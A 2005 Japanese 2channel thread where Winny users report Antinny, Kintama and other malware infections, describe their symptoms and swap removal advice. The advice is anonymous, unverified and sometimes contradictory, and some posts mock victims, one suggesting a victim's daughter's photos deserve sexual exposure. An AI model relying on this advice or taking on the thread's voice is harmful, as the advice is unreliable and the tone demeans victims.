 | |_| | _| |_| |_| |_  | | | r┐ r┐ | | | /  |   | レ'´ /  く`ヽ,__| |_| |_ !┘| ̄ ̄ ̄ ̄ ̄|‐┘
 | r┐| |___  __|. | | | 二 二 | | |く_/l |   |  , ‐'´     ∨|__  ___| r‐、 ̄| | ̄ ̄
 | |_.| |   /  ヽ    | | | |__| |__| | | |   | |  | |   __    /`〉  /  \      │ | |   ̄ ̄|
 |   | / /\ \.   | |└------┘| |   | |  | |__| |  / /  / /\ `- 、_ 丿 \| | ̄ ̄
   ̄ ̄ く_/   \ `フ |   ̄ ̄ ̄ ̄ ̄  |   | |  |____丿く / <´ /   `- 、_// ノ\  `ー―--┐
             `´ `‐' ̄ ̄ ̄ ̄ ̄`‐'     ̄          `   `´          `ー'    `ー───-′
506[名無し]さん(bin+cue).rar:05/03/06 19:07:18 ID:jh1FwUek0
スポンサー誰だよ!
507[名無し]さん(bin+cue).rar:05/03/06 19:10:31 ID:6jkMCwj20
オレオレ
508[名無し]さん(bin+cue).rar:05/03/06 19:23:23 ID:MpPp6m3H0
ホラー
509[名無し]さん(bin+cue).rar:05/03/06 19:24:46 ID:XOxwXhm70
しかもスプラッタ
510[名無し]さん(bin+cue).rar:05/03/06 20:05:29 ID:nhfqKJw00
 ____   r っ    ________   _ __,、       _ _    ___  _
 | .__ | __| |__  |____  ,____|  ,! / | l´      ,! /_| |__   |   |  ! /____,、
 | | | | | __  __ |  r┐ ___| |___ r┐  / / | |  /\  / __  __|  | ロ .| /   __  __l´
 | |_| | _| |_| |_| |_  | | | r┐ r┐ | | | /  |   | レ'´ / く_/___| |___ .| ロ .|く_ハ< | |
 | r┐| |___  __|. | | | 二 二 | | |く_/l |   |  , ‐'´    |___   ___| | ロ .|  ヽヽ//
 | |_.| |   /  ヽ    | | | |__| |__| | | |   | |  | |   __     / ヽ     |__ .__|    } /
 |   | / /\ \.   | |└------┘| |   | |  | |__| |   / /\ \   / ヽ   / ハヽ
   ̄ ̄ く_/   \ `フ |   ̄ ̄ ̄ ̄ ̄  |   | |  |____丿  く_/   \ `フく_/\`フく/ \`フ
511[名無し]さん(bin+cue).rar:05/03/06 20:59:22 ID:uXMC90FV0
やっぱりな・・・
512[名無し]さん(bin+cue).rar:05/03/06 21:06:39 ID:6jkMCwj20
スポンサーの俺が至らないばっかりに・・・orz
513[名無し]さん(bin+cue).rar:05/03/06 21:11:37 ID:XOxwXhm70
いや、スプラッタなんて企画出した俺が悪いんだ‥‥orz
514[名無し]さん(bin+cue).rar:05/03/06 21:29:19 ID:vqiRzhLP0
>>510
対処法とかありますか?
515[名無し]さん(bin+cue).rar:05/03/06 21:37:25 ID:q3iA89Dp0
>>514
マーケティングリサーチをしっかりやるとか
企画を充分煮詰めておくとか
予算管理をしっかりするとか
問題有りそうなスタッフやキャストは使わないとか
516[名無し]さん(bin+cue).rar:05/03/06 21:43:57 ID:NfWJA5K+0
つか、マジで10Gウイルスどうすればいいんだ…orz
517[名無し]さん(bin+cue).rar:05/03/06 21:51:36 ID:+Wpax+qe0
システム復元で症状はおさまったよ。
gomiplusてのがどこにあるのかは分からん。
残ってるなら消したい。
518[名無し]さん(bin+cue).rar:05/03/06 21:53:17 ID:Fg9+7DLS0
検索もできない奴がnyやるな
519[名無し]さん(bin+cue).rar:05/03/06 21:59:23 ID:nhfqKJw00
        出    部   こ                  __
        来    屋   の              /    \
        る    .を   ス             /  ノ┼ー  ヽ
        だ   明   レ               |  ─┴─  |
        け   る   を              ヽ  | ̄ ̄|  /
        遠   く    ご              \  ̄ ̄ /
        .く    し    覧                   ̄ ̄
        か   て    に
        ら    `   .な       /\___/ヽ      /\___/\
        ご          る      /''''''   '''''':::::::\   / ⌒   ⌒ ::: \
         覧       .時     |(●),   、(●)、.:|  | (●), 、(●)、 |  
           く        は     |   ,,ノ(、_, )ヽ、,, .::::|  |  ,,ノ(、_, )ヽ、,,   |  
        だ              |   `-=ニ=- ' .:::::::|  |   ト‐=‐ァ'   .::::|   
        さ               \  `ニニ´  .:::::/  .\  `ニニ´  .:::/
        い                `ー‐--‐‐―´.      `ー‐--‐‐―´´
520[名無し]さん(bin+cue).rar:05/03/06 22:28:49 ID:BMM3MLbd0
ttp://2ch.jpn21.net/Imgboard/01/data/img20050306222509.jpg
タスケテ。゚(゚'Д`゚)゚。
521[名無し]さん(bin+cue).rar:05/03/06 22:29:39 ID:BMM3MLbd0
動揺しててageてしまったorz
522[名無し]さん(bin+cue).rar:05/03/06 22:33:33 ID:IjUwjRs70
>>520
寄るな。
ウイルスが遷る。
523[名無し]さん(bin+cue).rar:05/03/06 22:35:18 ID:YmWRRnvh0
>>520
うわっ
よくそこまで放置できたなw
524[名無し]さん(bin+cue).rar:05/03/06 22:40:55 ID:aKn7FZgI0
いくらなんでもネタ画像だろ
525[名無し]さん(bin+cue).rar:05/03/07 00:16:55 ID:PZFHY/iZ0
キンタマにやられてデジカメの画像とかも全部やられてしまった・・・
娘の1歳の誕生日の画像とかあったのに・・・

こんな馬鹿な父ちゃんを許しておくれ ozr
526[名無し]さん(bin+cue).rar:05/03/07 00:55:34 ID:cbj4JbCh0
娘の1歳の誕生日の画像とか、nyで流れてる?
527[名無し]さん(bin+cue).rar:05/03/07 01:04:39 ID:o+fQYlml0
愛娘がペド野郎共のオカズにされるのは哀れな気もするが
まあ、晒されたっていいじゃない 泥棒だもの
528[名無し]さん(bin+cue).rar:05/03/07 01:45:46 ID:29T9kdV20
大事なデータ入ったPCでnyをやること自体信じられない
529[名無し]さん(bin+cue).rar:05/03/07 02:01:56 ID:iEma/frp0
>>525
ハッシュきぼんw
530[名無し]さん(bin+cue).rar:05/03/07 02:51:25 ID:Ho8ebBWH0
トレンドマイクロに登録されているAntinnyども。
A B C E G H J K P Q V X Y
しばらく見ない間にずいぶん増えたもんだな。YとかVとかきいたことないし。
531[名無し]さん(bin+cue).rar:05/03/07 02:58:14 ID:csa8ULnP0
アルファベット使い切ったら、Ωとかになるのかな
532[名無し]さん(bin+cue).rar:05/03/07 03:10:18 ID:iEma/frp0
まさか2byte文字を使う事はないだろ。
533[名無し]さん(bin+cue).rar:05/03/07 03:50:08 ID:5SS0hffZ0
A〜Z
AA〜AZ
BA〜BZ
以下同様

場合によっては制御コードが混じる2byte文字を使う訳が無い
脳は生きてる内に使っとけや
534[名無し]さん(bin+cue).rar:05/03/07 04:49:16 ID:vNw8fYx/0

01/01
         _□
         ('A`)  v  ( ) ( ) ( ) ( )
      | ̄ ̄|ノ) 田ノ( )V( ) ( )V( )
      | ̄ ̄ ̄ ̄ ̄| | |  | |  | |  | |
01/05
⊂⌒ヽ          (⌒⊃
  \ \  /⌒ヽ  / /
 ⊂二二二( ^ω^)ニニ二⊃
     \ \_∩_/ /
      (  (::)(::)  )
       ヽ_,*、_ノ  ブーン
   ///
 ///
01/06
_[警] 
  (  ) (^ω^ )
  (  )Vノ )
   | |  | |
01/07
               < ̄☆> 
         ⊂二二二( ^ω^)二⊃
              | 警 /
       /⌒ヽ    ( ヽノ
⊂二二二( ^ω^)二⊃ノ>ノ
     |    /  三 レレ
     ( ヽノ         それが人権擁護法案クオリティー
     ノ>ノ       http://that3.2ch.net/test/read.cgi/gline/1110125487/
  三  レレ
535[名無し]さん(bin+cue).rar:05/03/07 10:52:20 ID:x7doo9Ez0
Bagleなんかのバージョン文字列は、とっくにダブル表記だな。
536[名無し]さん(bin+cue).rar:05/03/07 15:06:28 ID:Br34Hoaz0
A列車で行こう7 マウントしたら
「ウイルスだったら HDアボーソだったぞ」
と出た。 実害はあるのかなあ?
537[名無し]さん(bin+cue).rar:05/03/07 15:09:21 ID:ehV1Sqmo0
>>536
「無い」って言ったら信じるのかい?
心配ならフォーマットしてOS再インスコしとけ
538[名無し]さん(bin+cue).rar:05/03/07 15:12:46 ID:0qWDmbxm0
家に帰ったら
「俺が泥棒だったら金目のもの盗まれてるぞ」
っていう置き手紙があるようなものだな。
いやそれ以上か。

まぁそれで経過を見守って見るも一興
539[名無し]さん(bin+cue).rar:05/03/07 15:17:44 ID:kZBv+W2H0
239 名前:(´Д`) ◆maohDL64.s [sage( ゚Д゚)<ポカーン] 投稿日:05/02/06(日) 01:32:47 ID:2gSt18n70
つーか、そういう物は即効性が重要な訳で。
わざわざ時限式ですよなんて教えてやる必要もないのだ。
対応されちゃったら無意味な訳だし。

おいらの結論:何の心配もしなくてよし
540[名無し]さん(bin+cue).rar:05/03/07 15:19:00 ID:iEma/frp0
ダウンロード板ってレベルの低さは初心者板のようなものだな。
いやそれ以上か。
541[名無し]さん(bin+cue).rar:05/03/07 15:19:42 ID:kZBv+W2H0
俺が仕組むなら、
フォーマットを気にするようにFakeで仕向けておいて、裏でトロイ
542[名無し]さん(bin+cue).rar:05/03/07 15:27:44 ID:9Tkw++yz0
autorunからbatファイルを実行させるタイプのやつって
CDイメージをスキャンしても検出してくれない
autorun無効にしてマウントしてスキャンしても無理。
Nortonじゃあ検出できないだけ?
543[名無し]さん(bin+cue).rar:05/03/07 15:28:12 ID:iEma/frp0
裏でトロイ←もうね、(ry
544[名無し]さん(bin+cue).rar:05/03/07 15:28:53 ID:WyK+SwaV0
>>542
batファイルを読め。
話はそれからだ。
545[名無し]さん(bin+cue).rar:05/03/07 15:31:42 ID:kZBv+W2H0
>>542
ここで扱うニュイルス(新型)は、
基本的にNorton等のアンチウィルスツールを更新して使っていても検出されないもの
546[名無し]さん(bin+cue).rar:05/03/07 15:40:46 ID:3sn8lU9m0
キンタマが出た時点でデスクトップ晒し上げだけでなく
キーロガー仕込んでそのログを垂れ流すような亜種も
出るだろうとか思ってたんだが未だに遭遇しない。
547[名無し]さん(bin+cue).rar:05/03/07 15:41:28 ID:9Tkw++yz0
>>544
いや正確に言えばautorunからexeを実行させるタイプなんだよ

>>545
刷れ違い?ごめん
548[名無し]さん(bin+cue).rar:05/03/07 15:45:34 ID:kZBv+W2H0
>>547
batファイルがテキストの従来からあるタイプなら、
対処は>>544でスレ違いだが、バイナリならスレ違いじゃないと思う
549[名無し]さん(bin+cue).rar:05/03/07 16:06:13 ID:0qWDmbxm0
>>540
その日本語だと、ここが初心者板より上なのか下なのかよくわからんな。
まぁ文脈で初心者板よりひどいって言いたいのはわかるけど……

しかし実際は二極分化してるだけなんだけどな。
正しくは「初心者」「上級者気取り初心者≒540」「上級者」か。
あーちなみに俺も初心者に毛の生えた程度難で悪しからず。
550[名無し]さん(bin+cue).rar:05/03/07 16:14:55 ID:d3s3kbMe0
初心者とか上級者とかそういう分類自体が滑稽でたまらん
551[名無し]さん(bin+cue).rar:05/03/07 16:17:08 ID:iEma/frp0
うはw日本語下手ですまんwww
552[名無し]さん(bin+cue).rar:05/03/07 16:20:48 ID:kZBv+W2H0
上級者っていうか、ウィルス開発者レベルの人は
ROMってニヤニヤしてるだけだから、
書き込んでる奴は9割方素人
553[名無し]さん(bin+cue).rar:05/03/07 16:22:25 ID:d3s3kbMe0
ウィルス開発者レベルの人は
ROMってニヤニヤしてるだけだから、

これを断言できる根拠は何処から沸いてくるのかと
554[名無し]さん(bin+cue).rar:05/03/07 16:22:36 ID:fc6uuLHj0
おれ上級者だよ
555[名無し]さん(bin+cue).rar:05/03/07 16:23:26 ID:965zEuVF0
おれは中級者
556[名無し]さん(bin+cue).rar:05/03/07 16:28:00 ID:kZBv+W2H0
>>553
そんな奴が初心者の溜まり場になってるこのスレに入り込んで、
煽ったりQ&Aに参加したりすると思うか?
開発者なら煽ったりする時間があれば自前のウイルスを強化するだろ
557[名無し]さん(bin+cue).rar:05/03/07 16:36:44 ID:+NdE4Pz40
>>556
人を嘲笑したり弄ぶのが楽しいからウィルス作ってんだろ
ウィルス作ってニヤニヤするのは初心者煽ったりするのと一緒
参加してると思うけどな。
まぁ想像の世界だし終着点は無いから何とも言えんがな
558[名無し]さん(bin+cue).rar:05/03/07 16:41:10 ID:ehV1Sqmo0
お前ら、スレ違いはその辺にしとけや
559[名無し]さん(bin+cue).rar:05/03/07 17:58:14 ID:h19vnME20
俺はもっと不思議
560[名無し]さん(bin+cue).rar:05/03/07 18:24:01 ID:aNFLxel40
このスレにいる(というかたまに流れをチェックする)んだが
あー、単に状況を知りたいという好奇心かな。
ある程度の解析情報は提供するけど、最近暇がないんでVPC立てて検証するほどじゃない。

新種の動きとか、業界(?)の対策とか、P2Pの今後とかネタでもあるので
できることはするし、できないことはしない。
スキルつーか、開発できてもリスクでかいからしないなぁ。
561[名無し]さん(bin+cue).rar:05/03/07 18:25:52 ID:fHQNctIc0
漏れは慌てふためいてるお馬鹿達をヲチしてニヤニヤするのが日課
562[名無し]さん(bin+cue).rar:05/03/07 19:17:21 ID:BvshwjNe0
空しい日課ですね
563[名無し]さん(bin+cue).rar:05/03/07 19:49:39 ID:MrHSyhYi0
質問です。
以下挙げる三回とも急にバスターが緊急ロックという動作をしたらしく
インターネットを切断され、PCを再起動しなくてはならないことがあったのですが、
どういった症状なのでしょうか。
バスターのパーソナルファイヤーウォールのログに経歴が残っていたので
晒しておきます。
ログ欄には「ネットワークウイルス」となっていました。

3/4の21:41
今日の11:08
続いて15:33

と各回とも違う送信元IPから来ていました。
ちなみに今日の二回ともnyも起動しており、
緊急ロックによりnyも停止していました。
(ただ初回時はnyを起動していたかどうか覚えていません)
564[名無し]さん(bin+cue).rar:05/03/07 19:57:24 ID:s6M9Gnsa0
>>563
激しくスレ違いの上に、情報が欠落し過ぎ。
565[名無し]さん(bin+cue).rar:05/03/07 21:16:20 ID:72AplXTH0
だな
まずは君にお姉さんか妹がいるかどうかくらい書かないとね
566[名無し]さん(bin+cue).rar:05/03/07 21:18:16 ID:Uzqkujv80
この板にも春が来たか
俺にも来ないかな
567[名無し]さん(bin+cue).rar:05/03/07 21:23:04 ID:0qWDmbxm0
繁華街に行けば売ってるから、好きなの買ってくると良いよ
568[名無し]さん(bin+cue).rar:05/03/07 22:16:43 ID:U2xkEOLg0
で、10Gウイルスはどーなったの?
569[名無し]さん(bin+cue).rar:05/03/07 22:26:30 ID:tbnRZvI80
>>568
これが10Gに関係あるかどうかわからないけど
今朝のノートンupdateでトロイ発見。
c:\WINDOWS\IME\IMEJPのimjpmig.exe駆除で10G収まった。
こいつが原因?
570[名無し]さん(bin+cue).rar:05/03/07 23:09:29 ID:D2HLD7SO0
よそで質問したところ、こちらに案内されたので質問させてください。
いつから感染してるのか不明ですが、右クリックからワードやエクセルの
新規文書を作成すると、92kbサイズでヘンなファイルが作成されます。
中身にはAAと「ぬるぽ」と書かれてます。アンチウイルスやスパイウエア
検出等いろいろ調べたのですが、よくわからないのです。

どこかにフォルダができていたり、regeditとノートパッドが入れ替わったりと
キンタマ系の特徴は見当たらないので違うと思うのですけど・・・

環境はWIN2000、Office2000です。
システムのアップデートは欠かしていません。アンチウイルスはAVGを
入れてあります。

どなたか、この状況を回避する手段わかりませんか?
571[名無し]さん(bin+cue).rar:05/03/07 23:20:32 ID:aNFLxel40
時限発動済みの ぬるぽ亜種。
その症状が出るときは、感染後時間が経って、すでに末期。
HDD全消去というか、特定拡張子ファイルのAA上書きが、いつ起こるかわからない
対処法だが、あんたのレベルだと、フォーマットして再インスコが一番。
データ含めて、失われたものはあきらめる。
572[名無し]さん(bin+cue).rar:05/03/08 00:46:20 ID:WKHGCNml0
>>409
やば、今見たら自分もそのファイル有るよ
ウイルスか?
http://maniakou.s7.xrea.com/cgi-bin/upload/img/img20050308004538.jpg
573[名無し]さん(bin+cue).rar:05/03/08 01:15:33 ID:VVakJhdU0
574[名無し]さん(bin+cue).rar:05/03/08 01:17:00 ID:dhI/6Ike0
ひどい事するなぁw
575[名無し]さん(bin+cue).rar:05/03/08 01:28:37 ID:w2YQvqri0
スタート準備動作の画像
という所は深読みするとちょっと怖いな。
576[名無し]さん(bin+cue).rar:05/03/08 01:41:24 ID:ItecYCgA0
>>573
指をつめる場合は左手からですよ。
577[名無し]さん(bin+cue).rar:05/03/08 02:38:11 ID:BUM79oUu0
10Gのウィルス?の対策でOS上書きインストールしたら直った。
復元ポイント作ってなかったし、クリーンインストールは面倒だからためしにやってみたら見事直ったって感じだ。
578[名無し]さん(bin+cue).rar:05/03/08 02:59:07 ID:v9O28PLE0
>>573
こういう板での場合はいいんだけど、知り合いにちょっと画像を弄っていちいち報告
してくる奴がいてウザイ。面白くも何ともねーし大して加工うまくもねーのにw

つーか以前明らかに差別的な内容の画像を送られて人間性を疑ったよ。
っとスレ違いすまそw
579[名無し]さん(bin+cue).rar:05/03/08 04:57:36 ID:rA2UeIn70
日記はチラシの裏にでも書いてろ
580[名無し]さん(bin+cue).rar:05/03/08 07:28:52 ID:8i5JmDQ+0
>>579
まて!578を立て読みしてみろ・・・

こしつっ

ネっトをやるやつがよくしてしまう行為・・・そう、固執だ。
タンに日記だと誤解するのはまだ早い!
投げかけてきているんだよ彼は!
下らないお前らがそんなに固執しているHDにそんな価値はあるのか?
しかも地の文章にある「ウザイ。。面白くも何ともねーし大して加工うまくもねーのにw 」
てんぐになっている解析者とふざけた情報しか出さない質問者に対する明らかなる批判の声だ!。
みんなよく考えるんだ!
るふされた情報に惑わされずに
よく自分の頭で考えろという・・・アナグラムだったんだよ!!!(すいませんこれは言ってみたかっただけです)
581[名無し]さん(bin+cue).rar:05/03/08 07:35:03 ID:6pzt8szW0
まこ?
582[名無し]さん(bin+cue).rar:05/03/08 07:38:35 ID:8i5JmDQ+0
うお!それは見逃してくれ・・・
583[名無し]さん(bin+cue).rar:05/03/08 07:52:06 ID:6pzt8szW0
う?w
584[名無し]さん(bin+cue).rar:05/03/08 07:58:35 ID:ItecYCgA0
まこはフェイクという高等技術だったんだよ!?
585[名無し]さん(bin+cue).rar:05/03/08 08:13:42 ID:54MFW5Ww0
ファイルのスキャンはavast! Antivirusでは不充分ですか?ノートンとか無いんで・・・
586[名無し]さん(bin+cue).rar:05/03/08 08:29:53 ID:/YJ4zan00
圧縮ファイル開く前の確認とかならぶっちゃけ不要
自分で内容見るなりして判断しろ
プログラムファイルの判断やキンタマ踏んでHD内にウイルスが撒かれてる等の状況なら必要だが
フリーでAntinny系への対応がいいのはBitDefender、AVP、Trend Microあたりらしい
587[名無し]さん(bin+cue).rar:05/03/08 08:30:32 ID:pxybPNsN0
な訳ないだろ
安心したいなら常駐ソフト買っとけ
常駐してても安心できんけどな
588[名無し]さん(bin+cue).rar:05/03/08 08:38:39 ID:cDQkmonz0
春っぽくなってきたな…
589585:05/03/08 08:44:20 ID:54MFW5Ww0
>>586-587
レスどうも。とりあえず586の試してみます。
590[名無し]さん(bin+cue).rar:05/03/08 09:08:26 ID:+C8iQqZA0
まこネタキボンヌ
591[名無し]さん(bin+cue).rar:05/03/08 09:24:52 ID:20y4cEwT0
まじで
こわいニュイルスおせぇてください
592[名無し]さん(bin+cue).rar:05/03/08 09:34:16 ID:PpJGaGVF0
585
avast!かAVG+BitDefender+System Safety Monitor+一応、ファイラーも

これでAntinnyもこわくないだろ
593[名無し]さん(bin+cue).rar:05/03/08 10:05:37 ID:qqsvz4NO0
まったくたて読みなんてくだらねえ
こんなことするくらいならオナニーしてる方がマシ
594[名無し]さん(bin+cue).rar:05/03/08 10:09:53 ID:qRMpENAf0
マイドキュメントによくわからん
コワイ画像がいつのまにか入ってた。

おかしいなとか思ってたら
とつぜんマイドキュメントのフォルダ削除
なぜだ・・・orz
595[名無し]さん(bin+cue).rar:05/03/08 10:16:52 ID:NN5qk+PY0
俺のパソにもバスターマシンさえいれば・・・。
596[名無し]さん(bin+cue).rar:05/03/08 10:19:50 ID:/YJ4zan00
俺のPCにもガンバスターさえいれば・・・
597[名無し]さん(bin+cue).rar:05/03/08 10:26:08 ID:v9O28PLE0
>>594
pgr
598[名無し]さん(bin+cue).rar:05/03/08 10:26:14 ID:wBQBLbvU0
オレのマシンにも可愛い妹がいれば・・・
599[名無し]さん(bin+cue).rar:05/03/08 10:31:22 ID:ItecYCgA0
PCの中から「お兄ちゃん!」て聞こえるのか?
600[名無し]さん(bin+cue).rar:05/03/08 10:35:23 ID:v9O28PLE0
「あれ?何故スピーカーでなくケースから声が?」
と思いケースを開けてみるとそこには幼女が入っていたってそんな話ですか!
さすがはDL板!
601[名無し]さん(bin+cue).rar:05/03/08 10:38:24 ID:RT84EF5p0
油で黒光りする羽の幼女がいる可能性はあります
602[名無し]さん(bin+cue).rar:05/03/08 10:42:01 ID:DlmUrY8w0
まぁまぁ
こんな事で騒がずのんびりやろうぜ
603[名無し]さん(bin+cue).rar:05/03/08 10:47:16 ID:wBQBLbvU0
>>601
部屋を掃除しろ
604[名無し]さん(bin+cue).rar:05/03/08 11:07:01 ID:QORH02XX0
初心者でスレ違いかもしれませんが質問させていただきます。
トレンドマイクロのオンラインスキャンでAntinny.Aが検出されました。
で、感染ファイルの削除とwinnyフォルダごと削除、
レジストリとwin.iniの修正はしました。
色々調べたんですけど、結局このAntinny.Aが行う動作は、
キャッシュのクリアと自分のコピーをUpフォルダに
置くだけなんでしょうか?
デスクトップのSSとかファイルを勝手にUpするウイルスとは
別物と判断していいんでしょうか?
どうぞよろしくお願いいたします。
605[名無し]さん(bin+cue).rar:05/03/08 11:14:51 ID:MQvuVDBv0
>604
マイドキュメントとデスクトップ下位フォルダ全部nyに揚がってると思うよ。
606[名無し]さん(bin+cue).rar:05/03/08 11:16:10 ID:/Dxf2p620
>>604
いまどきAntinny.Aに犯されてるくらいだから、ほかにもいろいろ
ありそうな悪寒。オンラインスキャンを信頼してそのまま使うのも
いいし、石橋を叩いて初期化&新規インスコするもよし。
607604:05/03/08 11:21:55 ID:QORH02XX0
ありがとうございます
>605、606
ってことは、Antinny.gとかと同じ動作をするんですか?
とりあえず再インストールはすることにします。
608[名無し]さん(bin+cue).rar:05/03/08 11:46:38 ID:3x3jAbnG0
【使用OS】 XP
【WindowsUpdateしてるか】 Yes
【使用AntiVirusソフト】 NAV、NIS
【AntiVirusをUpdateしてるか】 Yes
【ウイルススキャンの結果】 未検出
【オンラインスキャンしたなら結果】 No
【Winnyのバージョン】 未使用
【Winny歴、総DL量】未使用
【テンプレを読んだか】 Yes
【テンプレにある対策を実行したか】実行予定
【症状、具体的に分かる限りすべて書く】 カレント以下のフォルダ削除、(・ё・)〜.jpgファイル複数
【何をしたらそんなことになったのか】 アップローダ経由。フォルダアイコンに〜.exe。約4MB。削除しようとして誤ってダブルクリック
【これまでにとった措置】 スキャン、システムフォルダのexe・スタートアップ・reg起動実行の差分チェック(変化なし)

既知か未知か、既知であれば関連の情報しりたいです。
609[名無し]さん(bin+cue).rar:05/03/08 11:51:33 ID:yddjBItL0
意味が解らん
610[名無し]さん(bin+cue).rar:05/03/08 11:52:23 ID:8i5JmDQ+0
マイドキュメントの中身が全部消えちまったんだ・・・
このままじゃ俺の大事なデータがなくなっちまう!だれか
レクチャーしてくれると助かる!
いっしゅんにして全部消えちまったんだよ・・・
プゲラとか言ってる場合じゃネエヨー!
しけた意見はいらねえ!
てめえらの知恵を待ってるぜ!
611[名無し]さん(bin+cue).rar:05/03/08 11:55:44 ID:/YJ4zan00
>>608
ウイルスプログラム本体が残ってるならどこか大御所のオンラインスキャン試してみれ。検出されるかも
ってかあぷろだ経由ならなんでAntinny関係だと思ったんだ?

>>610
片仮名交じりとかイクナイ
612[名無し]さん(bin+cue).rar:05/03/08 11:56:00 ID:4ZuyD8DW0
(^ω^;)プギャー
613[名無し]さん(bin+cue).rar:05/03/08 11:56:10 ID:MQvuVDBv0
プゲラ
614[名無し]さん(bin+cue).rar:05/03/08 11:56:29 ID:TDie9aGV0
>>608
意味がわかんない。
症状は何かね?
10Gウイルス?
615[名無し]さん(bin+cue).rar:05/03/08 11:59:40 ID:4ZuyD8DW0
>>610
よしデフラグをおすすめするw
616[名無し]さん(bin+cue).rar:05/03/08 12:06:53 ID:3x3jAbnG0
本体はフォルダアイコン偽装タイプの4MBのexeです。
症例は、実行ファイルのあるフォルダの中のファイルとフォルダを削除します。
かわりに「(・ё・)〜.jpg」というファイル名でサイズのランダムなファイルを複数作成されます。
「今のところ」はそれ以外に症状も変化も確認してません。

サイズがでかいexe形式というのがp2pで流れてそうな感じがしたため
まずこちらで有名かお尋ねしようと思いました。
(・ё・)123456.jpgみたいなファイルを大量に吐くパターンが周知ならその詳細を知りたいと思いまして。
617[名無し]さん(bin+cue).rar:05/03/08 12:21:48 ID:iwd2X+t10
>>616
おそらく新作なのでここで対処法聞いても無駄だと思う
NAV持ってるなら、シマンテックに検体提出しといてください
618[名無し]さん(bin+cue).rar:05/03/08 12:53:33 ID:3x3jAbnG0
再インストするので
とりあえずチラシの裏しときます。

ウィルス本体:フォルダアイコン形式のexeファイル
ファイルサイズ:4,542,664Byte
ウィルススキャン:未反応
確認済症状:
1.exeのあるフォルダ以下のファイル・フォルダを削除。
2.「(・ё・)123456.jpg (数字は任意の6桁)」を作成。
   ファイルサイズはランダム(10kB〜200MB)。中は全て0bit。
   50MBの空き容量を残して終了?作成失敗まで続くと思われ。

他:
レジストリRun、スタートアップに変更は見当たらず。他の詳細は不明。
システムはDドライブ8Gで構成してるのでCドライブ目当て、10Gタイプとかは未遂してる可能性も。
実行環境:
WindowsXP  ServicePack2済
WindowsUpdate、Norton定義ファイル20050307更新済。
619[名無し]さん(bin+cue).rar:05/03/08 13:10:22 ID:0hMoFcwR0
対処法までは知らんけれども、ここは新作(らしきもの)を報告するスレやから
報告ってことでいいんでないの。
というか春の新作が出る時期なんですか。
620[名無し]さん(bin+cue).rar:05/03/08 13:28:01 ID:+8DwWnt+0
新種報告はありがたいけど、フォルダ偽装なんかにひっかかるのは
ウイルス対策以前の問題のような気がする。とりあえずテンプレ熟
読して推奨されてる対策は全部やっておいたほうが大吉。
621[名無し]さん(bin+cue).rar:05/03/08 13:30:37 ID:ItecYCgA0
4.5Mものexeって何がつまってんだろうなぁ
622[名無し]さん(bin+cue).rar:05/03/08 13:36:23 ID:4ZuyD8DW0
どうせ素人がビジュアル開発環境で作った無駄まみれのプログラムなんだろうなw
623[名無し]さん(bin+cue).rar:05/03/08 13:37:26 ID:4ZuyD8DW0
あぁもちろんファイルの容量を増やしただけって事も考えられる。
さすがに2M超えのEXEは作るには逆に工夫が必要だと思う。
624[名無し]さん(bin+cue).rar:05/03/08 13:37:54 ID:4ZuyD8DW0
なんか馬鹿丸出しなのでIDと文体変えて再登場します('A`)ノシ
625[名無し]さん(bin+cue).rar:05/03/08 13:37:55 ID:3x3jAbnG0
ご指摘ごもっとも。
ちなみに偽装も何もexe拡張子まで確認してます。なのに
選択して削除しようとした時に手がダブルクリック
脊髄反射は脳では止められなかったです(´・ω・`)
626[名無し]さん(bin+cue).rar:05/03/08 13:38:03 ID:Yk2tgs/c0
例えば壁紙内蔵とかな
みつをぬるぽ壁紙は約2.3MB
627[名無し]さん(bin+cue).rar:05/03/08 13:39:53 ID:MDToFxsC0
>>621
お前の恥ずかしい秘密
628[名無し]さん(bin+cue).rar:05/03/08 13:40:55 ID:iwd2X+t10
> ID:4ZuyD8DW0
君無駄口大杉 無駄にログを増やさないでくれ


612 名前:[名無し]さん(bin+cue).rar[sage] 投稿日:05/03/08(火) 11:56:00 ID:4ZuyD8DW0
(^ω^;)プギャー

615 名前:[名無し]さん(bin+cue).rar[sage] 投稿日:05/03/08(火) 11:59:40 ID:4ZuyD8DW0
>>610
よしデフラグをおすすめするw

622 名前:[名無し]さん(bin+cue).rar[sage] 投稿日:05/03/08(火) 13:36:23 ID:4ZuyD8DW0
どうせ素人がビジュアル開発環境で作った無駄まみれのプログラムなんだろうなw

623 名前:[名無し]さん(bin+cue).rar[sage] 投稿日:05/03/08(火) 13:37:26 ID:4ZuyD8DW0
あぁもちろんファイルの容量を増やしただけって事も考えられる。
さすがに2M超えのEXEは作るには逆に工夫が必要だと思う。

629[名無し]さん(bin+cue).rar:05/03/08 13:48:13 ID:CR3O0h030
それにしてもシングルクリックでファイルを実行するようにしてる人って
ある意味アレだね。勇者。
630[名無し]さん(bin+cue).rar:05/03/08 14:39:11 ID:GoG26NkJ0
>>629
俺シングルだけど…。あの…。別に勇者とか…。そんなんじゃ…。
し…。知らないんです。設定の方法とか。(お、教えてくれます?)
それに、ダブルだとマウスの電池が…。あのワイヤレスなんです。
でも一回も間違ってクッリックしたこと…。ないんですよ?えっへn。
631[名無し]さん(bin+cue).rar:05/03/08 14:50:08 ID:CR3O0h030
>>630
フォルダオプションの全般タブのクリック方法だったと思う。
そこで切り替えられますよたぶん。
632ひみつの文字列さん:2024/12/23(月) 19:51:56 ID:MarkedRes
日本国またはアメリカ合衆国、もしくはその両方の著作権法に触れる内容であると疑われることから表示できません。
633[名無し]さん(bin+cue).rar:05/03/08 19:09:31 ID:2WPfR5xJ0
実行してみた。
マイドキュメント以下の全てを削除して(・ё・)xxxxxx.jpg作る以外の動きがわからん。
634[名無し]さん(bin+cue).rar:05/03/08 20:07:01 ID:ABK/fkcL0
まあ、ウィルス踏む奴なんて素人なんだし
これに懲りたらnyやめることだな
635[名無し]さん(bin+cue).rar:05/03/08 21:18:30 ID:wx5SivOA0
まあ、国に帰るんだな
こんな、お前にも家族がいるだろう
636[名無し]さん(bin+cue).rar:05/03/08 21:39:13 ID:RX/dH8c/0
>>633
漏れも実行してみたけど、マイドキュメント以下の全てのファイルを削除
して(・ё・)xxxxxx.jpg作る以外に害はなさそうだね…
637[名無し]さん(bin+cue).rar:05/03/08 22:19:02 ID:Yk2tgs/c0
>>632-633
XPのシステム復元サービス絡みで悪さしてない?

ファイル:
system32\DRIVERS\sr.sys
RKEY:
SYSTEM\CurrentControlSet\Services\srservice
638[名無し]さん(bin+cue).rar:05/03/08 23:21:07 ID:RX/dH8c/0
>>633、636

IMJPMlG.exe

っての入ってない?
HDDへのアクセスがずーっと続くんだけど
